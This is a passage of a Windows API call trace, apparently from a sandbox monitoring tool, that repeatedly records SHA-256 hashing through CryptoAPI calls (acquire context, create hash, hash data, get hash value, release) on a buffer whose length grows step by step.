pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.612] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85110 [0186.612] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32e85110, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85110, pdwDataLen=0xcdf6c) returned 1 [0186.612] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0186.612] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0186.612] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821dd0) returned 1 [0186.613] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.613] CryptHashData (hHash=0x3396f7b0, pbData=0x32348160, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0186.613] CryptGetHashParam (in: hHash=0x3396f7b0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.613] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e847b0 [0186.613] CryptGetHashParam (in: hHash=0x3396f7b0, dwParam=0x2, pbData=0x32e847b0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e847b0, pdwDataLen=0xcdf6c) returned 1 [0186.613] CryptDestroyHash (hHash=0x3396f7b0) returned 1 [0186.613] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0186.613] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823ad0) returned 1 [0186.614] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.614] CryptHashData (hHash=0x3396f900, pbData=0x32348160, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0186.614] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.614] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84a20 [0186.614] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x2, pbData=0x32e84a20, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84a20, pdwDataLen=0xcdf6c) returned 1 [0186.614] CryptDestroyHash (hHash=0x3396f900) returned 1 [0186.614] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0186.614] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821ed0) returned 1 [0186.614] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.614] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x400, dwFlags=0x0) returned 1 [0186.614] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.614] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e851d0 [0186.614] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e851d0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e851d0, pdwDataLen=0xcdf6c) returned 1 [0186.614] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.614] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0186.614] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821fd0) returned 1 [0186.615] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.615] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x420, dwFlags=0x0) returned 1 [0186.615] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.615] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84b10 [0186.615] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e84b10, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84b10, pdwDataLen=0xcdf6c) returned 1 [0186.615] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0186.615] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0186.615] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338235d0) returned 1 [0186.616] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.616] CryptHashData (hHash=0x3396f900, pbData=0x32348160, dwDataLen=0x440, dwFlags=0x0) returned 1 [0186.616] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.616] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84e70 [0186.616] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x2, pbData=0x32e84e70, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84e70, pdwDataLen=0xcdf6c) returned 1 [0186.616] CryptDestroyHash (hHash=0x3396f900) returned 1 [0186.616] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0186.616] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0186.616] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.616] CryptHashData (hHash=0x3396ef60, pbData=0x32348160, dwDataLen=0x460, dwFlags=0x0) returned 1 [0186.616] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.616] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84f90 [0186.616] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x2, pbData=0x32e84f90, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84f90, pdwDataLen=0xcdf6c) returned 1 [0186.616] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0186.616] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0186.616] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821dd0) returned 1 [0186.617] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.617] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0x480, dwFlags=0x0) returned 1 [0186.617] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.617] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e848a0 [0186.617] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32e848a0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e848a0, pdwDataLen=0xcdf6c) returned 1 [0186.617] CryptDestroyHash (hHash=0x3396f430) returned 1 [0186.617] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0186.617] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338238d0) returned 1 [0186.618] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.618] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0186.618] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.618] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e846f0 [0186.618] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32e846f0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e846f0, pdwDataLen=0xcdf6c) returned 1 [0186.618] CryptDestroyHash (hHash=0x3396f430) returned 1 [0186.618] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0186.618] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338222d0) returned 1 [0186.618] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.619] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0186.619] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.619] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85200 [0186.619] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32e85200, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85200, pdwDataLen=0xcdf6c) returned 1 [0186.619] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0186.619] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0186.621] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338238d0) returned 1 [0186.622] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.622] CryptHashData (hHash=0x3396f4a0, pbData=0x32348160, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0186.622] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.622] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84ea0 [0186.622] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e84ea0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84ea0, pdwDataLen=0xcdf6c) returned 1 [0186.622] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0186.622] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0186.622] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338232d0) returned 1 [0186.623] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.623] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0x500, dwFlags=0x0) returned 1 [0186.623] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.623] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84ff0 [0186.623] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32e84ff0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84ff0, pdwDataLen=0xcdf6c) returned 1 [0186.623] CryptDestroyHash (hHash=0x3396f430) returned 1 [0186.623] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0186.623] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823ad0) returned 1 [0186.623] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.623] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0x520, dwFlags=0x0) returned 1 [0186.623] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.623] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84a50 [0186.623] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32e84a50, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84a50, pdwDataLen=0xcdf6c) returned 1 [0186.623] CryptDestroyHash (hHash=0x3396f660) returned 1 [0186.623] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0186.623] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338227d0) returned 1 [0186.624] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.624] CryptHashData (hHash=0x3396f7b0, pbData=0x32348160, dwDataLen=0x540, dwFlags=0x0) returned 1 [0186.624] CryptGetHashParam (in: hHash=0x3396f7b0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.624] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84990 [0186.624] CryptGetHashParam (in: hHash=0x3396f7b0, dwParam=0x2, pbData=0x32e84990, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84990, pdwDataLen=0xcdf6c) returned 1 [0186.624] CryptDestroyHash (hHash=0x3396f7b0) returned 1 [0186.624] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0186.624] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0186.625] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.625] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x560, dwFlags=0x0) returned 1 [0186.625] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.625] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e849c0 [0186.625] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e849c0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e849c0, pdwDataLen=0xcdf6c) returned 1 [0186.625] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0186.625] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0186.625] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0186.625] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.625] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x580, dwFlags=0x0) returned 1 [0186.625] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.625] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84a80 [0186.625] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e84a80, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84a80, pdwDataLen=0xcdf6c) returned 1 [0186.625] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.625] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0186.626] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823ad0) returned 1 [0186.639] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.639] CryptHashData (hHash=0x3396f040, pbData=0x32348160, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0186.639] CryptGetHashParam (in: hHash=0x3396f040, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.639] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85020 [0186.639] CryptGetHashParam (in: hHash=0x3396f040, dwParam=0x2, pbData=0x32e85020, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85020, pdwDataLen=0xcdf6c) returned 1 [0186.639] CryptDestroyHash (hHash=0x3396f040) returned 1 [0186.639] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0186.639] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0186.640] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.640] CryptHashData (hHash=0x3396f200, pbData=0x32348160, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0186.640] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.640] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e850b0 [0186.640] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x2, pbData=0x32e850b0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e850b0, pdwDataLen=0xcdf6c) returned 1 [0186.640] CryptDestroyHash (hHash=0x3396f200) returned 1 [0186.640] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0186.640] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823ad0) returned 1 [0186.640] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.640] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0186.640] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.640] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85140 [0186.640] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32e85140, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85140, pdwDataLen=0xcdf6c) returned 1 [0186.641] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0186.641] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0186.641] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338236d0) returned 1 [0186.641] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.641] CryptHashData (hHash=0x3396ef60, pbData=0x32348160, dwDataLen=0x600, dwFlags=0x0) returned 1 [0186.641] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.641] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84ae0 [0186.641] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x2, pbData=0x32e84ae0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84ae0, pdwDataLen=0xcdf6c) returned 1 [0186.641] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0186.641] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0186.641] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338221d0) returned 1 [0186.642] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.642] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0x620, dwFlags=0x0) returned 1 [0186.642] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.642] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85260 [0186.642] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32e85260, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85260, pdwDataLen=0xcdf6c) returned 1 [0186.642] CryptDestroyHash (hHash=0x3396f430) returned 1 [0186.642] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0186.642] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338228d0) returned 1 [0186.643] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.643] CryptHashData (hHash=0x3396f040, pbData=0x32348160, dwDataLen=0x640, dwFlags=0x0) returned 1 [0186.643] CryptGetHashParam (in: hHash=0x3396f040, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.643] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84c60 [0186.643] CryptGetHashParam (in: hHash=0x3396f040, dwParam=0x2, pbData=0x32e84c60, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84c60, pdwDataLen=0xcdf6c) returned 1 [0186.643] CryptDestroyHash (hHash=0x3396f040) returned 1 [0186.643] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0186.643] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338230d0) returned 1 [0186.643] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.643] CryptHashData (hHash=0x3396f5f0, pbData=0x32348160, dwDataLen=0x660, dwFlags=0x0) returned 1 [0186.643] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.643] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84b70 [0186.643] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32e84b70, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84b70, pdwDataLen=0xcdf6c) returned 1 [0186.643] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0186.643] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0186.643] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338221d0) returned 1 [0186.644] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.644] CryptHashData (hHash=0x3396efd0, pbData=0x32348160, dwDataLen=0x680, dwFlags=0x0) returned 1 [0186.644] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.644] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84cf0 [0186.644] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x2, pbData=0x32e84cf0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84cf0, pdwDataLen=0xcdf6c) returned 1 [0186.644] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0186.644] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0186.644] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822cd0) returned 1 [0186.645] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.645] CryptHashData (hHash=0x3396f200, pbData=0x32348160, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0186.645] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.645] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84c30 [0186.645] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x2, pbData=0x32e84c30, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84c30, pdwDataLen=0xcdf6c) returned 1 [0186.645] CryptDestroyHash (hHash=0x3396f200) returned 1 [0186.645] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0186.645] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338229d0) returned 1 [0186.646] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.646] CryptHashData (hHash=0x3396ef60, pbData=0x32348160, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0186.646] CryptGetHashParam (in: 